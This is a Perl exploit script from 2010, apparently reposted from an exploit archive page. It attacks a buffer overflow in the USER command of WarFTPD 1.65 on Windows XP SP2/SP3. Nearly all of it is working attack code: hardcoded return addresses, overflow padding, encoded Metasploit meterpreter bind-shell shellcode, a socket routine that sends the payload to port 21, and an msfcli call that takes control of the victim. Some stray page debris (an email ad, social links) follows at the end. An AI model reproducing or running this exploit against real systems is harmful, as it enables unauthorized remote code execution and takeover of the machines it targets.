WarFTPD version 1.65 USER remote buffer overflow exploit.
e6546c6df1507850819e3f17350110c5e82baa33b4be814da0753b293680e7b7
# Exploit Title: Remote Buffer Overflow Exploit WarFTPD 1.65 (USER) - Windows XP Pro SP2 / SP3 [English]
# Date: 26/6/2010
# Author: mr.pr0n
# Software Link: [download link if available]
# Version: WarFTPD 1.65
# Tested on: Windows XP Pro SP2 / SP3 [English]
# CVE : [if exists]
# Code :
#!/usr/bin/perl
use IO::Socket;
print "\n#----[ mr.pr0n ]--------------------------------------------------------#\n";
print "# Target App: WarFTPD 1.65 (USER). #\n";
print "# Attack : Remote Buffer Overflow Exploit. #\n";
print "# Target OS : Windows XP Pro [Service Pack 2 / Service Pack 3]. #\n";
print "#----------------------------------------[http://www.p0wnbox.com]-------#\n";
print "\nEnter your target's IP (e.g.: 192.168.0.123)\n";
print "> ";
$target=<STDIN>;
chomp($target);
print "Enter your target's version of Windows XP Service Pack [2/3] (e.g.: 2)\n";
print "> ";
$sp=<STDIN>;
chomp($sp);
if ($sp == 2) {
# Lets define the RET, if our target is Windows SP2.
$RET= "\x72\x93\xab\x71"; # ws2_32.dll push ESP - ret
}
elsif ($sp == 3)
{
# Lets define the RET, if our target is Windows SP3.
$RET= "\x53\x2b\xab\x71"; # ws2_32.dll push ESP - ret
}
else {
print "[-] Wrong version of Windows XP Service Pack!\n";
exit(1);
}
# We need 485 bytes to override the EIP.
$junkBytes = "\x41" x 485; # Send 485 "A".
# We need 569 bytes to override the Seh Handler.
$junkBytes_2 = "\x41" x 84; # Send(485 + 84 =)569 "A".
#-----------------------------------------------------------------------------------------------------------------------#
#[pr0n@megatron ~]$ msfpayload windows/meterpreter/bind_tcp LPORT=4444 R | msfencode -b '\x00\x0a\x0d\x40' -t c #
#[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1) #
#-----------------------------------------------------------------------------------------------------------------------#
#-----------------------------------------------#
# windows/meterpreter/bind_tcp - 326 bytes #
# http://www.metasploit.com #
# Encoder: x86/shikata_ga_nai #
# Bad Characters: \x00, \x0a, \x0d, \x40 #
# LPORT=4444 #
#-----------------------------------------------#
$shellcode =
"\xdb\xd3\x33\xc9\xd9\x74\x24\xf4\xb1\x4b\xba\xab\x11\xad\x09".
"\x5b\x83\xeb\xfc\x31\x53\x16\x03\x53\x16\xe2\x5e\xed\x45\x80".
"\xa0\x0e\x96\xf3\x29\xeb\xa7\x21\x4d\x7f\x95\xf5\x06\x2d\x16".
"\x7d\x4a\xc6\xad\xf3\x42\xe9\x06\xb9\xb4\xc4\x97\x0f\x78\x8a".
"\x54\x11\x04\xd1\x88\xf1\x35\x1a\xdd\xf0\x72\x47\x2e\xa0\x2b".
"\x03\x9d\x55\x58\x51\x1e\x57\x8e\xdd\x1e\x2f\xab\x22\xea\x85".
"\xb2\x72\x43\x91\xfc\x6a\xef\xfd\xdc\x8b\x3c\x1e\x20\xc5\x49".
"\xd5\xd3\xd4\x9b\x27\x1c\xe7\xe3\xe4\x23\xc7\xe9\xf5\x64\xe0".
"\x11\x80\x9e\x12\xaf\x93\x65\x68\x6b\x11\x7b\xca\xf8\x81\x5f".
"\xea\x2d\x57\x14\xe0\x9a\x13\x72\xe5\x1d\xf7\x09\x11\x95\xf6".
"\xdd\x93\xed\xdc\xf9\xf8\xb6\x7d\x58\xa5\x19\x81\xba\x01\xc5".
"\x27\xb1\xa0\x12\x51\x98\xac\xd7\x6c\x22\x2d\x70\xe6\x51\x1f".
"\xdf\x5c\xfd\x13\xa8\x7a\xfa\x54\x83\x3b\x94\xaa\x2c\x3c\xbd".
"\x68\x78\x6c\xd5\x59\x01\xe7\x25\x65\xd4\xa8\x75\xc9\x87\x08".
"\x25\xa9\x77\xe1\x2f\x26\xa7\x11\x50\xec\xc0\xe3\x75\x5c\x87".
"\x01\x89\x72\x0b\x8f\x6f\x1e\xa3\xd9\x38\xb7\x01\x3e\xf1\x20".
"\x79\x14\xae\xf9\xed\x20\xb9\x3e\x11\xb1\xec\x6c\xbe\x19\x66".
"\xe7\xac\x9d\x97\xf8\xf8\xb5\xc0\x6f\x76\x54\xa3\x0e\x87\x7d".
"\x51\xd1\x1d\x7a\xf3\x86\x89\x80\x22\xe0\x15\x7a\x01\x7a\x9f".
"\xee\xe9\x15\xe0\xfe\xe9\xe5\xb6\x94\xe9\x8d\x6e\xcd\xba\xa8".
"\x70\xd8\xaf\x60\xe5\xe3\x99\xd5\xae\x8b\x27\x03\x98\x13\xd8".
"\x66\x18\x6f\x0f\x4f\x9e\x99\x3a\xa3\x62\x6f";
if ($socket = IO::Socket::INET->new
(PeerAddr => $target,
# Default FTP Port!
PeerPort => "21",
Proto => "TCP"))
{
print "\n[*] Sending Buffer at: $target ...\n";
# This is our Buffer, we are sending a long username with the USER ftp command.
$exploit = "USER ".$junkBytes.$RET.$junkBytes_2.$shellcode;
print $socket $exploit."\r\n";
# Hey, wait only for a sec!
sleep(1);
close($socket);
print "[*] Exploitation Done!\n";
# Connect to the victim with metasploit.
$command = "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=$target LPORT=4444 E\n";
system ($command);
}
else
{
print "[-] Connection to $target failed!\n";
}
# That' all Folks ;)
_________________________________________________________________
Το email σας και πολλά ακόμα εν κινήσει. Αποκτήστε δωρεάν το Windows Live Hotmail.
https://signup.live.com/signup.aspx?id=60969
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed